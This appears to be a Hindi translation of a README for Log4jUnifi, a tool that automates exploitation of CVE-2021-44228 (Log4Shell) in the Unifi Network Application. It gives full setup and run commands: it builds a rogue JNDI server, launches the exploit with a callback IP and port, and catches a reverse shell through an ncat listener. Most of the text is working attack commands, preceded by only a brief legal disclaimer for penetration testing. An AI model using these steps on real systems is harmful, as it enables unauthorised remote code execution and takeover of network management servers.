
Unifi Network Application में CVE-2021-44228 का शोषण करके रिमोट कोड निष्पादन और बहुत कुछ।
Unifi Network Application में CVE-2021-44228 का शोषण करके रिमोट कोड निष्पादन और बहुत कुछ।
इस कमज़ोरी के प्रूफ ऑफ कॉन्सेप्ट बिखरे हुए हैं और इन्हें मैन्युअल रूप से करना होता है। यह रिपॉज़िटरी शोषण प्रक्रिया को स्वचालित करती है। पोस्ट-एक्सप्लॉयटेशन के लिए मार्गदर्शन हेतु ऊपर दिया गया ब्लॉग पोस्ट देखें।
इस रिपॉज़िटरी का उपयोग मैन्युअल रूप से या Docker के साथ किया जा सकता है।
एक्सप्लॉइट को मैन्युअल रूप से डाउनलोड और चलाने के लिए, निम्नलिखित चरणों को निष्पादित करें। सबसे पहले, सुनिश्चित करें कि आपके हमलावर होस्ट पर Java और Maven इंस्टॉल हैं। Debian-आधारित ऑपरेटिंग सिस्टम पर apt का उपयोग करके ऐसा करने के लिए, निम्न कमांड चलाएँ:
apt update && apt install openjdk-11-jre maven
GitHub रिपॉज़िटरी को क्लोन करें और सभी Python आवश्यकताएँ इंस्टॉल करें:
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
&& cd Log4jUnifi && pip3 install -r requirements.txt
Log4jUnifi रिपॉज़िटरी के रूट से, नीचे दिए गए कमांड का उपयोग करके Rogue-Jndi प्रोजेक्ट को कंपाइल करें:
mvn package -f utils/rogue-jndi/
सबसे पहले, सुनिश्चित करें कि आपके हमलावर होस्ट पर Docker इंस्टॉल है। (मैं आपको यह करने की प्रक्रिया नहीं समझाऊँगा)
इसके बाद, रिपॉज़िटरी को क्लोन करने और हमारे द्वारा उपयोग किए जाने वाले Docker इमेज को बनाने के लिए निम्न कमांड निष्पादित करें।
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jUnifi \
&& cd Log4jUnifi && docker build -t log4junifi .
कंटेनर चलाने के लिए, अपने कमांड लाइन फ़्लैग्स जोड़कर निम्न जैसा कमांड चलाएँ। ध्यान दें कि कंटेनर रिवर्स शेल को कैप्चर नहीं करेगा। आपको एक अलग शेल सत्र में ncat लिसनर बनाने की आवश्यकता है:
docker run -it -v $(pwd)/loot:/Log4jUnifi/loot -p 8090:8090 -p 1389:1389 log4junifi \
-u https://unifi.acme.com:8443 -i 192.168.1.1 -p 4444
usage: exploit.py [-h] -u URL -i CALLBACK -p PORT
optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Unifi Network Manager base URL
-i CALLBACK, --ip CALLBACK
Callback IP for payload delivery and reverse shell.
-p PORT, --port PORT Callback port for reverse shell.
अपने स्थानीय सिस्टम पर इंस्टॉल किए गए टूल का उपयोग करके रिवर्स शेल प्राप्त करें:
python3 exploit.py -u https://unifi.acme.com:8443 -i 10.10.10.1 -p 4444
यह टूल पेनेट्रेशन टेस्टिंग के दौरान उपयोग के लिए डिज़ाइन किया गया है; बिना पूर्व आपसी सहमति के लक्ष्यों पर हमला करने के लिए इस टूल का उपयोग अवैध है। सभी लागू स्थानीय, राज्य और संघीय कानूनों का पालन करना अंतिम उपयोगकर्ता की ज़िम्मेदारी है। डेवलपर्स कोई दायित्व नहीं मानते हैं और इस प्रोग्राम के किसी भी दुरुपयोग के लिए ज़िम्मेदार नहीं हैं।